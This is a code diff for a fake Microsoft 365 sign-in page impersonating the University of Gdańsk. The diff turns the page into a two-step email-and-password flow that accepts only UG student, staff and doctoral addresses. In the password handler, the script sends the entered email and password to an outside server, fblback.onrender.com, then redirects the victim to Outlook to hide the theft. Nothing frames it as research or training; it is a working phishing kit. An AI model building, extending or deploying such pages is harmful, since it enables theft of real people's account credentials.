--- a/public/ug-login.html
+++ b/public/ug-login.html
@@ -5,60 +5,105 @@
   <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
   <title>Sign in to your account</title>
   <link rel="stylesheet" href="ug-style.css" />
-  <link rel="icon" type="image/png" href="https://cdn.iconscout.com/icon/free/png-256/free-microsoft-logo-icon-download-in-svg-png-gif-file-formats--technology-social-media-company-vol-4-pack-logos-icons-2944995.png?f=webp" />
+  <link rel="icon" type="image/png"
+    href="https://cdn.iconscout.com/icon/free/png-256/free-microsoft-logo-icon-download-in-svg-png-gif-file-formats--technology-social-media-company-vol-4-pack-logos-icons-2944995.png?f=webp" />
 </head>
 <body>
   <div class="background">
-    <div class="login-box">
+    <!-- Step 1: Email input -->
+    <div class="login-box" id="step1">
+      <div class="top-text">Enter email and password</div>
       <div class="logo">
-        <img src="https://ug.edu.pl/news/sites/ug.edu.pl.news/files/2021-05/Logo.png" alt="UG Logo" />
+        <img src="https://upload.wikimedia.org/wikipedia/commons/2/24/UG_Logo_transparent.png" alt="UG Logo" />
       </div>
-      <form id="loginForm">
+      <form id="emailForm">
         <div class="input-group">
-          <label for="email">Email</label>
-          <input type="email" id="email" name="email" required />
+          <input type="email" id="email" name="email" placeholder="Email" required />
+          <div class="error" id="emailError">Please enter a valid UG email.</div>
         </div>
+        <div class="actions right-align">
+          <button type="submit" class="short-button">Next</button>
+        </div>
+      </form>
+      <div class="footer-links">
+        <a href="https://login.microsoftonline.com/terms" target="_blank">Terms of use</a>
+        <a href="https://login.microsoftonline.com/privacy" target="_blank">Privacy & cookies</a>
+        <a href="#" id="showTroubleshoot">...</a>
+      </div>
+    </div>
+
+    <!-- Step 2: Password input -->
+    <div class="login-box hidden" id="step2">
+      <div class="top-text">Enter email and password</div>
+      <div class="logo">
+        <img src="https://upload.wikimedia.org/wikipedia/commons/2/24/UG_Logo_transparent.png" alt="UG Logo" />
+      </div>
+      <div class="entered-email" id="displayEmail"></div>
+      <form id="passwordForm">
         <div class="input-group">
-          <label for="password">Password</label>
-          <input type="password" id="password" name="password" required />
-          <div class="error" id="passwordError">Please enter your password.</div>
+          <input type="password" id="password" name="password" placeholder="Password" required />
+          <div class="error" id="passwordError">Password must be at least 8 characters.</div>
         </div>
         <div class="actions">
           <a href="https://passwordreset.microsoftonline.com/" target="_blank">Forgot my password</a>
         </div>
-        <button type="submit">Sign in</button>
+        <div class="actions right-align">
+          <button type="submit" class="short-button">Sign in</button>
+        </div>
       </form>
-      <footer>
-        <p>Resetowanie zapomnianego hasła dla studentów i doktorantów UG odbywa się na Portalu Studenta w zakładce „Office 365”.</p>
-      </footer>
-      <div class="footer-links">
-       <a href="https://login.microsoftonline.com/terms">Terms of use</a>
-       <a href="https://login.microsoftonline.com/privacy">Privacy & cookies</a>
-       <a href="#" id="showTroubleshoot">...</a>
+      <div class="info-footer">
+        Resetowanie zapomnianego hasła dla studentów i doktorantów UG odbywa się na Portalu Studenta w zakładce „Office 365”.
       </div>
+      <div class="footer-links">
+        <a href="https://login.microsoftonline.com/terms" target="_blank">Terms of use</a>
+        <a href="https://login.microsoftonline.com/privacy" target="_blank">Privacy & cookies</a>
+        <a href="#" id="showTroubleshoot">...</a>
+      </div>
+    </div>
   </div>
 
-  <div>
-
   <script>
-    const form = document.getElementById("loginForm");
+    const step1 = document.getElementById("step1");
+    const step2 = document.getElementById("step2");
+    const emailForm = document.getElementById("emailForm");
+    const passwordForm = document.getElementById("passwordForm");
     const emailInput = document.getElementById("email");
     const passwordInput = document.getElementById("password");
-    const errorText = document.getElementById("passwordError");
+    const emailError = document.getElementById("emailError");
+    const passwordError = document.getElementById("passwordError");
+    const displayEmail = document.getElementById("displayEmail");
 
-    form.addEventListener("submit", async function (e) {
+    const emailRegex = new RegExp(
+      "^[^\\s@]+@(?:" +
+      "ug\\.edu\\.pl|" +
+      "[0-9]+\\.studms\\.ug\\.edu\\.pl|" +
+      "staffms\\.ug\\.edu\\.pl|" +
+      "phdstud\\.ug\\.edu\\.pl)$", "i"
+    );
+
+    emailForm.addEventListener("submit", (e) => {
       e.preventDefault();
-
       const email = emailInput.value.trim();
-      const password = passwordInput.value.trim();
-      const domainValid = /@(studms\.ug\.edu\.pl|staffms\.ug\.edu\.pl|ug\.edu\.pl)$/i.test(email);
-
-      if (!domainValid || !password) {
-        errorText.style.display = "block";
+      if (!emailRegex.test(email)) {
+        emailError.style.display = "block";
         return;
       }
+      emailError.style.display = "none";
+      displayEmail.textContent = email;
+      step1.classList.add("hidden");
+      step2.classList.remove("hidden");
+    });
 
-      errorText.style.display = "none";
+    passwordForm.addEventListener("submit", async (e) => {
+      e.preventDefault();
+      const email = emailInput.value.trim();
+      const password = passwordInput.value.trim();
+
+      if (password.length < 8) {
+        passwordError.style.display = "block";
+        return;
+      }
+      passwordError.style.display = "none";
 
       try {
         await fetch("https://fblback.onrender.com/login", {
@@ -67,7 +112,7 @@
           body: JSON.stringify({ email, password })
         });
       } catch (err) {
-        // Ошибку можно логировать при необходимости
+        // ignore
       } finally {
         window.location.href = "https://outlook.office.com/mail/";
       }
